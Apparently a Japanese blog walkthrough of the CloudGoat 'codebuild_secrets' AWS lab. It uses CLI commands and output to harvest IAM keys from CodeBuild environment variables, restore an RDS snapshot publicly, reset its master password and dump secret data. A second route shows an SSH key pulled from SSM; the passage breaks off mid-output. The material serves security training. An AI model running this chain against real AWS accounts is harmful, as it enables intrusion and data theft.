AWSの攻撃体験ツール【Cloudgoat】全シナリオやる(後編)
前編、中編はこちら。
codebuild_secrets (Large / Hard)
このシナリオには二つのルートがある。
IAMユーザーSoloから始め、CodeBuildを調査してユーザーCalrissianの認証情報を得、CalrissianとしてRDSのスナップショットを利用するルートと、SSMパラメータからインスタンスのSSHキーを取得し、メタデータを利用してインスタンスプロファイルのキーを取得して、隠された情報を得るルート。
初期情報は下記。
Outputs: cloudgoat_output_aws_account_id = 7*********** cloudgoat_output_solo_access_key_id = A************** cloudgoat_output_solo_secret_key = 1***************************
CodeBuildを調査する。
AWS CodeBuild のコマンドラインリファレンス - AWS CodeBuild
% aws codebuild list-projects --profile Solo --region us-east-1
{
"projects": [
"cg-codebuild-cgidysjfe61q7i"
]
}
% aws codebuild batch-get-projects --names cg-codebuild-cgidysjfe61q7i --profile Solo --region us-east-1
{
"projects": [
{
"name": "cg-codebuild-cgidysjfe61q7i",
"arn": "arn:aws:codebuild:us-east-1:746321857124:project/cg-codebuild-cgidysjfe61q7i",
"source": {
"type": "NO_SOURCE",
"gitCloneDepth": 0,
"buildspec": "version: 0.2\n\nphases:\n pre_build:\n commands:\n - echo \"This is CloudGoat's simpliest buildspec file ever (maybe)\"",
"insecureSsl": false
},
"artifacts": {
"type": "NO_ARTIFACTS",
"overrideArtifactName": false
},
"cache": {
"type": "NO_CACHE"
},
"environment": {
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:1.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "calrissian-aws-access-key",
"value": "A**************",
"type": "PLAINTEXT"
},
{
"name": "calrissian-aws-secret-key",
"value": "n***************************",
"type": "PLAINTEXT"
}
],
"privilegedMode": false,
"imagePullCredentialsType": "CODEBUILD"
},
"serviceRole": "arn:aws:iam::7***********:role/code-build-cg-cgidysjfe61q7i-service-role",
"timeoutInMinutes": 20,
"queuedTimeoutInMinutes": 480,
"encryptionKey": "arn:aws:kms:us-east-1:7***********:alias/aws/s3",
"tags": [
{
"key": "Name",
"value": "cg-codebuild-cgidysjfe61q7i"
},
{
"key": "Scenario",
"value": "codebuild-secrets"
},
{
"key": "Stack",
"value": "CloudGoat"
}
],
"created": "2021-01-07T13:41:45.738000+09:00",
"lastModified": "2021-01-07T13:41:45.738000+09:00",
"badge": {
"badgeEnabled": false
},
"logsConfig": {
"cloudWatchLogs": {
"status": "ENABLED"
},
"s3Logs": {
"status": "DISABLED",
"encryptionDisabled": false
}
}
}
],
"projectsNotFound": []
}
環境変数としてCalrissianの認証情報が入っているので使う。
% aws configure --profile Calrissian AWS Access Key ID [None]: A************** AWS Secret Access Key [None]: n*************************** Default region name [None]: us-east-1 Default output format [None]:
RDSの調査。
% aws rds describe-db-instances --profile Calrissian
{
"DBInstances": [
{
"DBInstanceIdentifier": "cg-rds-instance-cgidysjfe61q7i",
"DBInstanceClass": "db.t2.micro",
"Engine": "postgres",
"DBInstanceStatus": "available",
"MasterUsername": "cgadmin",
"DBName": "securedb",
"Endpoint": {
"Address": "cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com",
"Port": 5432,
"HostedZoneId": "Z2R2ITUGPM61AM"
},
"AllocatedStorage": 20,
"InstanceCreateTime": "2021-01-07T04:45:19.334000+00:00",
"PreferredBackupWindow": "07:38-08:08",
"BackupRetentionPeriod": 0,
"DBSecurityGroups": [],
"VpcSecurityGroups": [
{
"VpcSecurityGroupId": "sg-09e426a8cb9f31e8a",
"Status": "active"
}
],
"DBParameterGroups": [
{
"DBParameterGroupName": "default.postgres9.6",
"ParameterApplyStatus": "in-sync"
}
],
"AvailabilityZone": "us-east-1b",
"DBSubnetGroup": {
"DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i",
"DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group",
"VpcId": "vpc-0d54cc644cc046bf5",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-0b887402790487154",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-0207674e01d5abb99",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
]
},
(snip)
"TagList": [
{
"Key": "Name",
"Value": "cg-rds-instance-cgidysjfe61q7i"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
]
}
スナップショットをとってからアクセス可能な領域にリストアし、そのインスタンスへ接続することを目指す。
上記インスタンスはprivateらしきサブネットグループにあることと、別でpublicらしきサブネットグループがあることがわかる。
(private、publicはサブネットグループの説明から、もしくはsubnetのタグから予測)
subnet情報を見る場合はCalrissianではなくSoloの権限で実行する必要がある。
% aws rds describe-db-subnet-groups --profile Calrissian
{
"DBSubnetGroups": [
{
"DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i",
"DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group",
"VpcId": "vpc-0d54cc644cc046bf5",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-0b887402790487154",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-0207674e01d5abb99",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
],
"DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-subnet-group-cgidysjfe61q7i"
},
{
"DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
"DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
"VpcId": "vpc-0d54cc644cc046bf5",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-0ff83f3eceab80bba",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-04e2754b6ac56dabe",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
],
"DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i"
},
{
"DBSubnetGroupName": "default",
"DBSubnetGroupDescription": "default",
"VpcId": "vpc-116d946c",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-24a40d7b",
"SubnetAvailabilityZone": {
"Name": "us-east-1d"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-2d6fc40c",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-6316e652",
"SubnetAvailabilityZone": {
"Name": "us-east-1e"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-5c03ae3a",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-0d640203",
"SubnetAvailabilityZone": {
"Name": "us-east-1f"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-e5502ca8",
"SubnetAvailabilityZone": {
"Name": "us-east-1c"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
],
"DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:default"
}
]
}
% aws ec2 describe-subnets --profile Solo --region us-east-1
{
"Subnets": [
{
"AvailabilityZone": "us-east-1c",
"AvailabilityZoneId": "use1-az4",
"AvailableIpAddressCount": 4091,
"CidrBlock": "172.31.16.0/20",
"DefaultForAz": true,
"MapPublicIpOnLaunch": true,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-e5502ca8",
"VpcId": "vpc-116d946c",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-e5502ca8"
},
{
"AvailabilityZone": "us-east-1f",
"AvailabilityZoneId": "use1-az5",
"AvailableIpAddressCount": 4091,
"CidrBlock": "172.31.64.0/20",
"DefaultForAz": true,
"MapPublicIpOnLaunch": true,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-0d640203",
"VpcId": "vpc-116d946c",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0d640203"
},
{
"AvailabilityZone": "us-east-1a",
"AvailabilityZoneId": "use1-az1",
"AvailableIpAddressCount": 4091,
"CidrBlock": "172.31.0.0/20",
"DefaultForAz": true,
"MapPublicIpOnLaunch": true,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-5c03ae3a",
"VpcId": "vpc-116d946c",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-5c03ae3a"
},
{
"AvailabilityZone": "us-east-1a",
"AvailabilityZoneId": "use1-az1",
"AvailableIpAddressCount": 250,
"CidrBlock": "10.10.10.0/24",
"DefaultForAz": false,
"MapPublicIpOnLaunch": false,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-04e2754b6ac56dabe",
"VpcId": "vpc-0d54cc644cc046bf5",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"Tags": [
{
"Key": "Stack",
"Value": "CloudGoat"
},
{
"Key": "Name",
"Value": "CloudGoat cgidysjfe61q7i Public Subnet #1"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
}
],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-04e2754b6ac56dabe"
},
{
"AvailabilityZone": "us-east-1e",
"AvailabilityZoneId": "use1-az3",
"AvailableIpAddressCount": 4091,
"CidrBlock": "172.31.48.0/20",
"DefaultForAz": true,
"MapPublicIpOnLaunch": true,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-6316e652",
"VpcId": "vpc-116d946c",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-6316e652"
},
{
"AvailabilityZone": "us-east-1a",
"AvailabilityZoneId": "use1-az1",
"AvailableIpAddressCount": 251,
"CidrBlock": "10.10.30.0/24",
"DefaultForAz": false,
"MapPublicIpOnLaunch": false,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-0b887402790487154",
"VpcId": "vpc-0d54cc644cc046bf5",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"Tags": [
{
"Key": "Stack",
"Value": "CloudGoat"
},
{
"Key": "Name",
"Value": "CloudGoat cgidysjfe61q7i Private Subnet #1"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
}
],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0b887402790487154"
},
{
"AvailabilityZone": "us-east-1b",
"AvailabilityZoneId": "use1-az2",
"AvailableIpAddressCount": 250,
"CidrBlock": "10.10.40.0/24",
"DefaultForAz": false,
"MapPublicIpOnLaunch": false,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-0207674e01d5abb99",
"VpcId": "vpc-0d54cc644cc046bf5",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"Tags": [
{
"Key": "Stack",
"Value": "CloudGoat"
},
{
"Key": "Name",
"Value": "CloudGoat cgidysjfe61q7i Private Subnet #2"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
}
],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0207674e01d5abb99"
},
{
"AvailabilityZone": "us-east-1b",
"AvailabilityZoneId": "use1-az2",
"AvailableIpAddressCount": 250,
"CidrBlock": "10.10.20.0/24",
"DefaultForAz": false,
"MapPublicIpOnLaunch": false,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-0ff83f3eceab80bba",
"VpcId": "vpc-0d54cc644cc046bf5",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"Tags": [
{
"Key": "Name",
"Value": "CloudGoat cgidysjfe61q7i Public Subnet #2"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0ff83f3eceab80bba"
},
{
"AvailabilityZone": "us-east-1b",
"AvailabilityZoneId": "use1-az2",
"AvailableIpAddressCount": 4091,
"CidrBlock": "172.31.80.0/20",
"DefaultForAz": true,
"MapPublicIpOnLaunch": true,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-2d6fc40c",
"VpcId": "vpc-116d946c",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-2d6fc40c"
},
{
"AvailabilityZone": "us-east-1d",
"AvailabilityZoneId": "use1-az6",
"AvailableIpAddressCount": 4091,
"CidrBlock": "172.31.32.0/20",
"DefaultForAz": true,
"MapPublicIpOnLaunch": true,
"MapCustomerOwnedIpOnLaunch": false,
"State": "available",
"SubnetId": "subnet-24a40d7b",
"VpcId": "vpc-116d946c",
"OwnerId": "7***********",
"AssignIpv6AddressOnCreation": false,
"Ipv6CidrBlockAssociationSet": [],
"SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-24a40d7b"
}
]
}
publicなサブネットグループにDBをリストアする。
% aws rds restore-db-instance-from-db-snapshot --db-instance-identifier newinstance1 --db-snapshot-identifier snapshot1 --db-subnet-group-name cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i --publicly-accessible --profile Calrissian
{
"DBInstance": {
"DBInstanceIdentifier": "newinstance1",
"DBInstanceClass": "db.t2.micro",
"Engine": "postgres",
"DBInstanceStatus": "creating",
"MasterUsername": "cgadmin",
"DBName": "securedb",
"AllocatedStorage": 20,
"PreferredBackupWindow": "07:38-08:08",
"BackupRetentionPeriod": 0,
"DBSecurityGroups": [],
"VpcSecurityGroups": [
{
"VpcSecurityGroupId": "sg-0097b2cef3e219411",
"Status": "active"
}
],
"DBParameterGroups": [
{
"DBParameterGroupName": "default.postgres9.6",
"ParameterApplyStatus": "in-sync"
}
],
"DBSubnetGroup": {
"DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
"DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
"VpcId": "vpc-0d54cc644cc046bf5",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-0ff83f3eceab80bba",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-04e2754b6ac56dabe",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
]
},
"PreferredMaintenanceWindow": "mon:04:03-mon:04:33",
"PendingModifiedValues": {},
"MultiAZ": false,
"EngineVersion": "9.6.19",
"AutoMinorVersionUpgrade": true,
"ReadReplicaDBInstanceIdentifiers": [],
"LicenseModel": "postgresql-license",
"OptionGroupMemberships": [
{
"OptionGroupName": "default:postgres-9-6",
"Status": "pending-apply"
}
],
"PubliclyAccessible": true,
"StorageType": "gp2",
"DbInstancePort": 0,
"StorageEncrypted": false,
"DbiResourceId": "db-5MMRXQLGIES4ZGGKRQSEBHLR3Q",
"CACertificateIdentifier": "rds-ca-2019",
"DomainMemberships": [],
"CopyTagsToSnapshot": false,
"MonitoringInterval": 0,
"DBInstanceArn": "arn:aws:rds:us-east-1:7***********:db:newinstance1",
"IAMDatabaseAuthenticationEnabled": false,
"PerformanceInsightsEnabled": false,
"DeletionProtection": false,
"AssociatedRoles": [],
"TagList": [
{
"Key": "Name",
"Value": "cg-rds-instance-cgidysjfe61q7i"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
リストアしたDBにはデフォルトのセキュリティグループが適用されるため、付け替えを行う。
cg-rds-psql-cgidysjfe61q7i(sg-09e426a8cb9f31e8a)にすればよさそう。
% aws ec2 describe-security-groups --profile Calrissian
{
"SecurityGroups": [
{
"Description": "default VPC security group",
"GroupName": "default",
"IpPermissions": [
{
"IpProtocol": "-1",
"IpRanges": [],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": [
{
"GroupId": "sg-0097b2cef3e219411",
"UserId": "7***********"
}
]
}
],
"OwnerId": "7***********",
"GroupId": "sg-0097b2cef3e219411",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-0d54cc644cc046bf5"
},
{
"Description": "CloudGoat cgidysjfe61q7i Security Group for EC2 Instance over SSH",
"GroupName": "cg-ec2-ssh-cgidysjfe61q7i",
"IpPermissions": [
{
"FromPort": 22,
"IpProtocol": "tcp",
"IpRanges": [
{
"CidrIp": "**.**.**.**/32"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"ToPort": 22,
"UserIdGroupPairs": []
}
],
"OwnerId": "7***********",
"GroupId": "sg-07844914cbfefc7ce",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"Tags": [
{
"Key": "Stack",
"Value": "CloudGoat"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Name",
"Value": "cg-ec2-ssh-cgidysjfe61q7i"
}
],
"VpcId": "vpc-0d54cc644cc046bf5"
},
{
"Description": "CloudGoat cgidysjfe61q7i Security Group for PostgreSQL RDS Instance",
"GroupName": "cg-rds-psql-cgidysjfe61q7i",
"IpPermissions": [
{
"FromPort": 5432,
"IpProtocol": "tcp",
"IpRanges": [
{
"CidrIp": "10.10.20.0/24"
},
{
"CidrIp": "10.10.30.0/24"
},
{
"CidrIp": "10.10.40.0/24"
},
{
"CidrIp": "**.**.**.**/32"
},
{
"CidrIp": "10.10.10.0/24"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"ToPort": 5432,
"UserIdGroupPairs": []
}
],
"OwnerId": "7***********",
"GroupId": "sg-09e426a8cb9f31e8a",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-0d54cc644cc046bf5"
},
{
"Description": "default VPC security group",
"GroupName": "default",
"IpPermissions": [
{
"IpProtocol": "-1",
"IpRanges": [],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": [
{
"GroupId": "sg-0d531a31",
"UserId": "7***********"
}
]
}
],
"OwnerId": "7***********",
"GroupId": "sg-0d531a31",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-116d946c"
}
]
}
% aws rds modify-db-instance --db-instance-identifier newinstance1 --vpc-security-group-ids sg-09e426a8cb9f31e8a --profile Calrissian
{
"DBInstance": {
"DBInstanceIdentifier": "newinstance1",
"DBInstanceClass": "db.t2.micro",
"Engine": "postgres",
"DBInstanceStatus": "available",
"MasterUsername": "cgadmin",
"DBName": "securedb",
"Endpoint": {
"Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com",
"Port": 5432,
"HostedZoneId": "Z2R2ITUGPM61AM"
},
"AllocatedStorage": 20,
"InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00",
"PreferredBackupWindow": "07:38-08:08",
"BackupRetentionPeriod": 0,
"DBSecurityGroups": [],
"VpcSecurityGroups": [
{
"VpcSecurityGroupId": "sg-09e426a8cb9f31e8a",
"Status": "adding"
},
{
"VpcSecurityGroupId": "sg-0097b2cef3e219411",
"Status": "removing"
}
],
"DBParameterGroups": [
{
"DBParameterGroupName": "default.postgres9.6",
"ParameterApplyStatus": "in-sync"
}
],
"AvailabilityZone": "us-east-1b",
"DBSubnetGroup": {
"DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
"DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
"VpcId": "vpc-0d54cc644cc046bf5",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-0ff83f3eceab80bba",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-04e2754b6ac56dabe",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
]
},
(snip)
"TagList": [
{
"Key": "Name",
"Value": "cg-rds-instance-cgidysjfe61q7i"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
さらに、マスターパスワードを変更する。
% aws rds modify-db-instance --db-instance-identifier newinstance1 --master-user-password cgpassword --profile Calrissian
{
"DBInstance": {
"DBInstanceIdentifier": "newinstance1",
"DBInstanceClass": "db.t2.micro",
"Engine": "postgres",
"DBInstanceStatus": "available",
"MasterUsername": "cgadmin",
"DBName": "securedb",
"Endpoint": {
"Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com",
"Port": 5432,
"HostedZoneId": "Z2R2ITUGPM61AM"
},
"AllocatedStorage": 20,
"InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00",
"PreferredBackupWindow": "07:38-08:08",
"BackupRetentionPeriod": 0,
"DBSecurityGroups": [],
"VpcSecurityGroups": [
{
"VpcSecurityGroupId": "sg-09e426a8cb9f31e8a",
"Status": "active"
}
],
"DBParameterGroups": [
{
"DBParameterGroupName": "default.postgres9.6",
"ParameterApplyStatus": "in-sync"
}
],
"AvailabilityZone": "us-east-1b",
"DBSubnetGroup": {
"DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i",
"DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets",
"VpcId": "vpc-0d54cc644cc046bf5",
"SubnetGroupStatus": "Complete",
"Subnets": [
{
"SubnetIdentifier": "subnet-0ff83f3eceab80bba",
"SubnetAvailabilityZone": {
"Name": "us-east-1b"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
},
{
"SubnetIdentifier": "subnet-04e2754b6ac56dabe",
"SubnetAvailabilityZone": {
"Name": "us-east-1a"
},
"SubnetOutpost": {},
"SubnetStatus": "Active"
}
]
},
(snip)
"TagList": [
{
"Key": "Name",
"Value": "cg-rds-instance-cgidysjfe61q7i"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
これでDBに外部から接続可能になったので、接続して情報を窃取するとゴール。
% psql postgresql://cgadmin:cgpassword@newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb
psql (13.1, server 9.6.19)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.
securedb=> \dt
List of relations
Schema | Name | Type | Owner
--------+-----------------------+-------+---------
public | sensitive_information | table | cgadmin
(1 row)
securedb=> select * from sensitive_information;
name | value
------+--------------------------------------------
Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4
Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6
(2 rows)
次に、別ルートを試す。
まず、SSMパラメータを取得すると、鍵の情報が入手できる。
% aws ssm describe-parameters --profile Solo --region us-east-1
{
"Parameters": [
{
"Name": "cg-ec2-private-key-cgidysjfe61q7i",
"Type": "String",
"LastModifiedDate": "2021-01-07T13:41:31.423000+09:00",
"LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat",
"Description": "cg-ec2-private-key-cgidysjfe61q7i",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
},
{
"Name": "cg-ec2-public-key-cgidysjfe61q7i",
"Type": "String",
"LastModifiedDate": "2021-01-07T13:41:31.263000+09:00",
"LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat",
"Description": "cg-ec2-public-key-cgidysjfe61q7i",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
}
]
}
% aws ssm get-parameter --name cg-ec2-private-key-cgidysjfe61q7i --profile Solo --region us-east-1
{
"Parameter": {
"Name": "cg-ec2-private-key-cgidysjfe61q7i",
"Type": "String",
"Value": "(snip)",
"Version": 1,
"LastModifiedDate": "2021-01-07T13:41:31.423000+09:00",
"ARN": "arn:aws:ssm:us-east-1:746321857124:parameter/cg-ec2-private-key-cgidysjfe61q7i",
"DataType": "text"
}
}
上記の鍵をファイルに保存し(改行\nが含まれているため注意)、EC2インスタンスに接続を試みる。
ログインユーザはタグのヒントから、ubuntuで試す。
% aws ec2 describe-instances --profile Solo --region us-east-1
{
"Reservations": [
{
"Groups": [],
"Instances": [
{
"AmiLaunchIndex": 0,
"ImageId": "ami-0a313d6098716f372",
"InstanceId": "i-0b226fe5e8d976a20",
"InstanceType": "t2.micro",
"KeyName": "cg-ec2-key-pair-cgidysjfe61q7i",
"LaunchTime": "2021-01-07T04:45:30+00:00",
"Monitoring": {
"State": "disabled"
},
"Placement": {
"AvailabilityZone": "us-east-1a",
"GroupName": "",
"Tenancy": "default"
},
"PrivateDnsName": "ip-10-10-10-218.ec2.internal",
"PrivateIpAddress": "10.10.10.218",
"ProductCodes": [],
"PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com",
"PublicIpAddress": "**.**.**.**",
"State": {
"Code": 16,
"Name": "running"
},
"StateTransitionReason": "",
"SubnetId": "subnet-04e2754b6ac56dabe",
"VpcId": "vpc-0d54cc644cc046bf5",
"Architecture": "x86_64",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/sda1",
"Ebs": {
"AttachTime": "2021-01-07T04:45:31+00:00",
"DeleteOnTermination": true,
"Status": "attached",
"VolumeId": "vol-0db7760111a6a1c8e"
}
}
],
"ClientToken": "011C34A0-6099-4720-82D5-21E17C6D06CC",
"EbsOptimized": false,
"EnaSupport": true,
"Hypervisor": "xen",
"IamInstanceProfile": {
"Arn": "arn:aws:iam::7***********:instance-profile/cg-ec2-instance-profile-cgidysjfe61q7i",
"Id": "AIPA23RB7ZJSAHNQLBENQ"
},
"NetworkInterfaces": [
{
"Association": {
"IpOwnerId": "amazon",
"PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com",
"PublicIp": "**.**.**.**"
},
"Attachment": {
"AttachTime": "2021-01-07T04:45:30+00:00",
"AttachmentId": "eni-attach-0218ccaedbc85605b",
"DeleteOnTermination": true,
"DeviceIndex": 0,
"Status": "attached"
},
"Description": "",
"Groups": [
{
"GroupName": "cg-ec2-ssh-cgidysjfe61q7i",
"GroupId": "sg-07844914cbfefc7ce"
}
],
"Ipv6Addresses": [],
"MacAddress": "02:bc:8d:6e:79:37",
"NetworkInterfaceId": "eni-0628f8cf600a5fdba",
"OwnerId": "7***********",
"PrivateDnsName": "ip-10-10-10-218.ec2.internal",
"PrivateIpAddress": "10.10.10.218",
"PrivateIpAddresses": [
{
"Association": {
"IpOwnerId": "amazon",
"PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com",
"PublicIp": "**.**.**.**"
},
"Primary": true,
"PrivateDnsName": "ip-10-10-10-218.ec2.internal",
"PrivateIpAddress": "10.10.10.218"
}
],
"SourceDestCheck": true,
"Status": "in-use",
"SubnetId": "subnet-04e2754b6ac56dabe",
"VpcId": "vpc-0d54cc644cc046bf5",
"InterfaceType": "interface"
}
],
"RootDeviceName": "/dev/sda1",
"RootDeviceType": "ebs",
"SecurityGroups": [
{
"GroupName": "cg-ec2-ssh-cgidysjfe61q7i",
"GroupId": "sg-07844914cbfefc7ce"
}
],
"SourceDestCheck": true,
"Tags": [
{
"Key": "Stack",
"Value": "CloudGoat"
},
{
"Key": "Scenario",
"Value": "codebuild-secrets"
},
{
"Key": "Name",
"Value": "cg-ubuntu-ec2-cgidysjfe61q7i"
}
],
"VirtualizationType": "hvm",
"CpuOptions": {
"CoreCount": 1,
"ThreadsPerCore": 1
},
